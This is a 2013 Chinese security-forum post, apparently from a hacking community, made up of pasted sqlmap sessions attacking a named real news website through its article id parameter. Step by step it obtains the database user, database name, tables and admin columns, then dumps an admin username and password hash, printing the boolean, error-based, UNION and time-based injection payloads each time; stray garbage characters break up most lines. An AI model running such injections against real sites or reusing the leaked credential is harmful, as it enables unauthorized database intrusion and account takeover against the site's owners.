找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2493|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 E) p1 J- v3 B+ k5 n3 i+ z$ K
ms "Mysql" --current-user       /*  注解:获取当前用户名称7 g6 I  X# U" q8 ~$ p6 i
    sqlmap/0.9 - automatic SQL injection and database takeover tool
- r! [# V  X4 [0 A    http://sqlmap.sourceforge.net
  • starting at: 16:53:54/ }& Q1 {$ z  H# P  m
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    * ^* j' Y  O, n/ v; A, x session file6 Z: r: W: X# w' b
    [16:53:54] [INFO] resuming injection data from session file
    6 I! l7 {0 R% p[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ E6 P1 g6 [/ o9 f8 j9 \
    [16:53:54] [INFO] testing connection to the target url
    6 f$ W, [: J2 P  h8 Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ' [/ K5 D# J# F& h. j! x& D3 jsts:) r0 m1 y6 ]% L3 |
    ---  U. V# q: F9 e( o$ P
    Place: GET
    ) V' r% C+ M" t  ?, P- \Parameter: id) A9 ^4 ^; [& @# h# O
        Type: boolean-based blind3 ]' z% l2 r& y" X5 `  n$ Q
        Title: AND boolean-based blind - WHERE or HAVING clause0 x2 ~0 C4 U- G# s. s* V
        Payload: id=276 AND 799=799: F, b! t0 C$ m) Z9 ]
        Type: error-based
    + g9 a0 }8 y/ p: N3 |    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    / Z# t/ q7 C! h0 i    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ! u* ^+ w- E. Q$ T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 r6 [! l3 k( `9 ]3 d
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# w" G# A: T0 ~3 b- _- f
        Type: UNION query' o& s8 t, G& w7 ~
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    : Q- r0 A6 }) b9 k7 L0 z! u    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    / A, Z# W9 {. v1 [% m% V% J5 q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 s, l) t$ Y  j% ?
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    , F$ g& v- U8 p* E7 b' P    Type: AND/OR time-based blind0 E6 S) |/ X3 v1 g# v
        Title: MySQL > 5.0.11 AND time-based blind
    4 C: \, X4 ]. t# j    Payload: id=276 AND SLEEP(5)
    : ?$ r% I# H  M1 s0 G---
    / R$ R; w0 e3 l' y  I7 ]- i[16:53:55] [INFO] the back-end DBMS is MySQL
    $ ^4 T' ~8 X* X, l% Vweb server operating system: Windows
    " ~# e/ O3 Z3 L& y  y4 Lweb application technology: Apache 2.2.11, PHP 5.3.0
    # q* J' V; c% a, a4 m( }; Zback-end DBMS: MySQL 5.0' s$ r" J5 K+ Q+ V! M) |
    [16:53:55] [INFO] fetching current user8 Q+ H  v  b* O6 d% X: Q
    current user:    'root@localhost'   $ r, {1 I2 s* q3 {- Q
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    9 o! W' d4 |* qtput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    + Z$ C5 |0 K! R$ }/ o
    7 B# `+ s& ~6 v" H  G. A5 t2 {+ nD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    0 B" T$ ^0 d3 R. [$ a5 Cms "Mysql" --current-db                  /*当前数据库
    6 m% M; C8 b) A1 Z% b* e    sqlmap/0.9 - automatic SQL injection and database takeover tool+ y/ t/ N2 h' x7 T: d( w1 ^& Y/ P
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    ; N6 ^# T1 \# i% g4 d3 ~1 G. v1 T[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    " p7 u2 v; L# b* R$ m; y6 W session file
    4 ?. r: n5 E! J3 j[16:54:16] [INFO] resuming injection data from session file
    6 W5 q. ]! A# B0 ]  }: q1 t[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    % P9 y$ i8 T2 V( x[16:54:16] [INFO] testing connection to the target url
    , `" S9 T' g6 @8 t+ }& \sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 ]) ]0 g  G& ^! l) C; ksts:: @5 @7 d: ]3 J% f* P9 B2 a& D
    ---
    9 s  R/ _! f% k* l8 r. _1 T  APlace: GET: f9 a7 B+ v0 {4 i! r
    Parameter: id
    $ Y6 i; P+ H5 T, {% j1 k# I    Type: boolean-based blind( f5 C/ i6 B* K+ |, V2 O
        Title: AND boolean-based blind - WHERE or HAVING clause
      H9 q9 Y# L: Q% Y, W+ k: M4 j    Payload: id=276 AND 799=799$ h  u" r7 Z; Z+ c- p
        Type: error-based/ u! b! Z6 W, i+ h
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: H# j. R, p  _* X& }4 |0 M
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    " ?; r0 a! G* q& w  D! B6 z. Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% g7 o; I' W: k6 g& D
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). L& D, r3 y; G+ @, ^+ M
        Type: UNION query) j3 J% J0 N& J9 H
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    , X7 W# @7 K& @4 w! w: A/ ?    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    , c4 d1 Q7 L- P+ s$ ]# h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- p( z7 U7 v3 p! x, W
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    $ _" w- ?( }# ?8 O' u    Type: AND/OR time-based blind
    # P. r( M  i6 ~5 U& Z3 ?% ?    Title: MySQL > 5.0.11 AND time-based blind
    ( ^9 ~& j  K& r; p" A7 c1 m    Payload: id=276 AND SLEEP(5)
      c; t3 F) h! O* {---% Z! c: b; X5 J" f& ]6 F
    [16:54:17] [INFO] the back-end DBMS is MySQL$ x9 y4 z$ j$ D. B% _% e( q
    web server operating system: Windows
    8 a' q6 h* F2 t' Aweb application technology: Apache 2.2.11, PHP 5.3.0  w  @# x# ~  }9 i( ^/ b
    back-end DBMS: MySQL 5.0: g+ B9 y* @2 P. |7 l" i
    [16:54:17] [INFO] fetching current database
    7 O  _1 T8 f4 c$ qcurrent database:    'wepost'$ r( n. u  n! ^* k
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' q8 {  |# W: c# R4 z$ K( z9 \
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:183 [; t2 Z6 [+ S  Q. E. Z" r* m
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" V% m1 G9 p5 l' Z8 E2 ^& c
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    : R3 W, A* K2 U4 ]: w    sqlmap/0.9 - automatic SQL injection and database takeover tool
    - t6 l+ P3 h' U    http://sqlmap.sourceforge.net
  • starting at: 16:55:25  C# C4 M9 N) R; `- ~" U4 x
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as2 d5 W7 g; @5 U
    session file
    ! C3 i, B+ N5 Y8 C: W5 S9 V[16:55:25] [INFO] resuming injection data from session file
    8 ~5 d, }- d  x4 h* a- n! D[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file, a+ Y8 K$ {7 `- g# d' k3 K
    [16:55:25] [INFO] testing connection to the target url* X5 K5 N" O, V$ K- v. d
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque. V' W1 W5 m# H( o( d2 o" |) W3 o
    sts:% `0 ~+ A& T# [5 L5 P+ s
    ---
    1 y! Z; y. C" B3 O& N& q9 XPlace: GET
    3 ?/ m" K! R' X, A5 O  lParameter: id& e' X, p& _+ |1 u% U; b: B' c
        Type: boolean-based blind; S) B1 {; L* l1 C1 {
        Title: AND boolean-based blind - WHERE or HAVING clause
    # R0 w  |# O* s$ r; v    Payload: id=276 AND 799=799- |: q  q$ I9 d( i2 W% c6 Z2 k
        Type: error-based% ]( b" `. I; i( B. ]& d8 V4 u4 ~
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    2 W" C9 k4 s3 g% X& A    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    6 R& j8 |+ l: Y3 c! y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    " R% n! ?' `9 A/ m) Y$ v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    : H: B& V/ q3 x: v7 `; |4 J    Type: UNION query
    / _; A8 `, I! a8 i    Title: MySQL UNION query (NULL) - 1 to 10 columns
    7 e* R0 T5 m+ K& N9 Z' y    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& \6 p3 \; l3 V, X4 B: Y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / X) u( `- r( z1 m4 \  S5 G) J( lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 Z" r6 O) E- h; s2 Z: D
        Type: AND/OR time-based blind
    6 Y) w( q) t+ e# m( z5 [& `    Title: MySQL > 5.0.11 AND time-based blind* {5 G3 I- |. V2 S, _5 O
        Payload: id=276 AND SLEEP(5)
    . U$ c/ g" b0 h7 B; `---
    $ S# G; T' d" g/ M5 f9 C[16:55:26] [INFO] the back-end DBMS is MySQL
    : L7 p6 G. W1 w# n# j4 l6 L0 `web server operating system: Windows
    / [: A% C9 i6 S! A, W( n& s6 Y1 W4 u$ [web application technology: Apache 2.2.11, PHP 5.3.0
    $ W* ]: Q, Z& J0 d9 A6 z9 pback-end DBMS: MySQL 5.0
    + m" O7 h6 {) }[16:55:26] [INFO] fetching tables for database 'wepost'& Y/ ?2 ?) u5 d
    [16:55:27] [INFO] the SQL query used returns 6 entries
    / A( i+ C$ F. x) t1 f, JDatabase: wepost$ X1 d6 j: X/ V- @+ \2 O$ i, T$ M
    [6 tables]
    * O7 @5 O. K! V+-------------+
    1 r4 u9 d5 v: G| admin       |2 R# Y2 u  i# f2 K0 `" T$ }  q; U
    | article     |
    * D( a2 j# ?% j- O. u9 }2 ~| contributor |1 z8 e  o/ \* N. O! U( w8 M" J
    | idea        |# Z8 v( J$ M. O9 j+ y$ l( K$ W
    | image       |" O# V1 k- N* m0 Z) l
    | issue       |
    : Z, i* p6 x: {& h$ J, d+-------------+
    ; q" U% S) o8 n  {/ e, ^- l4 U( V: Y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 b. v( y- N. }, X" ?0 Z1 U% r
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33  ?4 _6 S' h; A3 P3 T0 d8 R5 f; m$ q

    " L& {# y& F6 Q1 u- }% TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 s) q0 y; P# ?' p
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    5 g  O+ e, A4 J    sqlmap/0.9 - automatic SQL injection and database takeover tool
    8 h6 |' J" n( B# S    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    2 M0 {3 w7 }1 f/ p+ [$ u& ^. r3 tsqlmap identified the following injection points with a total of 0 HTTP(s) reque5 w4 _7 L. A" D$ {
    sts:$ o' E* d3 E* K9 z/ A
    ---& t. d" e3 ~( J2 A' f7 u: P, V
    Place: GET. E+ o" U7 W8 o7 q, K- K4 y$ P
    Parameter: id
    ' |7 b; A3 G2 e2 ?  h    Type: boolean-based blind% Y* ~' ?4 D) g$ d. p0 d2 E2 Q
        Title: AND boolean-based blind - WHERE or HAVING clause
    4 d$ |, I3 x& f0 v    Payload: id=276 AND 799=799
    / A% c- m% {( V/ Z1 A    Type: error-based: E$ r8 k2 U+ `: h
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    " U6 S6 r2 Y. K! Z, Y    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# B5 d2 W) a& ^! |
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 g& i4 p' F: e
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    # x5 Y3 }0 ~3 r' w' e    Type: UNION query
    0 I& J( U3 g1 ]( E/ J4 [    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ; U* {" J, l# U. E0 h5 U: X* }. B    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 U$ A9 ]% b( {
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( g+ J5 A+ v$ i9 W4 z2 S! V6 x
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 a) Q+ U9 D8 I
        Type: AND/OR time-based blind+ q: C+ c- \. r& D
        Title: MySQL > 5.0.11 AND time-based blind
    ' C+ F8 @: o; l! R; g2 }# j6 C    Payload: id=276 AND SLEEP(5)
    / ^: O7 c5 M" U; R( W---0 m$ |0 U% u' S8 {2 j
    web server operating system: Windows
    8 D# S8 C8 j9 i3 ?" W/ B" @; S* Zweb application technology: Apache 2.2.11, PHP 5.3.0
    6 @+ B+ _  p% c3 A9 Yback-end DBMS: MySQL 5.0
    ' h- ^0 W' i6 ^7 e0 o3 i/ S- G$ j7 L[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    " ?# m; g, |) K% c9 w- Jssion': wepost, wepost
    , F  V$ c0 K2 E% d: y& X4 ]Database: wepost
    , W# y: x5 H2 cTable: admin, \' _; Q; @- i
    [4 columns]
    ! U+ X0 A% b6 y1 P+----------+-------------+; ~/ K& ~" D7 |* e# f# Z8 O  |% ?
    | Column   | Type        |
    ) X8 t9 ]3 `) H, x+ ^* M7 F3 @+----------+-------------+  w, ]/ z! F0 \. ^7 K
    | id       | int(11)     |
    3 x& s' k  s3 {! g  n| password | varchar(32) |1 ]: @8 ?2 l. c8 L, n- ?
    | type     | varchar(10) |
    - W0 @! K$ z1 m& T2 V| userid   | varchar(20) |% `1 l5 P: w, m$ Y2 o
    +----------+-------------+
    ) f! ]% K' V0 u$ T! C  H/ E/ n
  • shutting down at: 16:56:19" B) `% k& c0 g1 G+ z+ R1 L( {

    $ m0 ], u, b1 Z  |. _  M# GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    & n; z* X  T& Ims "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容3 z" P3 v" c4 }) ]# r# C
        sqlmap/0.9 - automatic SQL injection and database takeover tool' R- N' R& ]: G% Z1 o! b; {9 B
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14+ S+ e' J2 |! x& @9 ^& K2 N- J
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    : T5 c& l3 ]; Q7 S* bsts:
    : Z. y4 c) `% [1 o# j% Z  u) s---1 e) F) w! p. l& M
    Place: GET, k0 d% e% F" l7 W; F7 A
    Parameter: id
    ' Z. _& E% H; K. g; p    Type: boolean-based blind8 J, y. n  z% B+ q9 W
        Title: AND boolean-based blind - WHERE or HAVING clause
    8 h( ^, ]- @5 Z& J  S; e2 a    Payload: id=276 AND 799=7993 s0 t8 R6 K4 E, Y
        Type: error-based
    ( y, E, K" G$ C) |/ T2 C    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, W7 E+ S6 J8 o- q' R6 ~
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    : Z$ h  c5 e, m120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    0 ]8 `, a( `1 u6 S! F! K& D# l) ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 y4 K7 H* N& v$ n- ]) B
        Type: UNION query( g& Y7 z, a+ i1 K- X% p
        Title: MySQL UNION query (NULL) - 1 to 10 columns& U' p  N, W2 S# G! H/ M
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 y1 X' D- o* F7 o) \
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    - w$ `( w# h1 h# z6 {, p; e$ oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    $ T: E# C7 A8 q    Type: AND/OR time-based blind
    & E) n8 h4 Q- v8 W  I    Title: MySQL > 5.0.11 AND time-based blind  Z$ O8 O4 I9 W6 A6 j
        Payload: id=276 AND SLEEP(5)
    2 E9 D  {; l* a& B' y+ ?9 m" Z---
    & E+ R5 A- Z$ Z9 m+ i& d4 \web server operating system: Windows
    9 D' J& k* o% e! Yweb application technology: Apache 2.2.11, PHP 5.3.0. J" ~  m+ H( R: ^: _, G" F6 L
    back-end DBMS: MySQL 5.0/ o/ h" l3 [/ l% L1 p7 }5 t+ W: ]) l
    recognized possible password hash values. do you want to use dictionary attack o
    7 j' F: r" E5 M5 U% c, bn retrieved table items? [Y/n/q] y! d+ H8 ]4 y, d) W; t7 Y& Q
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    6 K4 U/ u3 r% T) Odo you want to use common password suffixes? (slow!) [y/N] y7 p) L* }% M7 i, U3 p( ^
    Database: wepost  _+ t$ j3 m! E! {* Y
    Table: admin% Y% U5 T/ {6 J! x# N+ j
    [1 entry]8 o2 `6 U/ ]: R, x) b$ Y' Y5 }
    +----------------------------------+------------+
    + P) B9 A. F. X+ N. s& I* `| password                         | userid     |$ ]5 _* w* T: W- k% k2 i& [% ^
    +----------------------------------+------------+
    ) k: |+ L3 D! p2 c" N| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    : ~8 ]) I0 D! n9 _: R+----------------------------------+------------+1 N* H# ]2 `+ a
  • shutting down at: 16:58:141 B, d8 e- x4 p% K  n) n9 r0 T

    4 R5 l& d, i- c- W/ K6 j# {D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表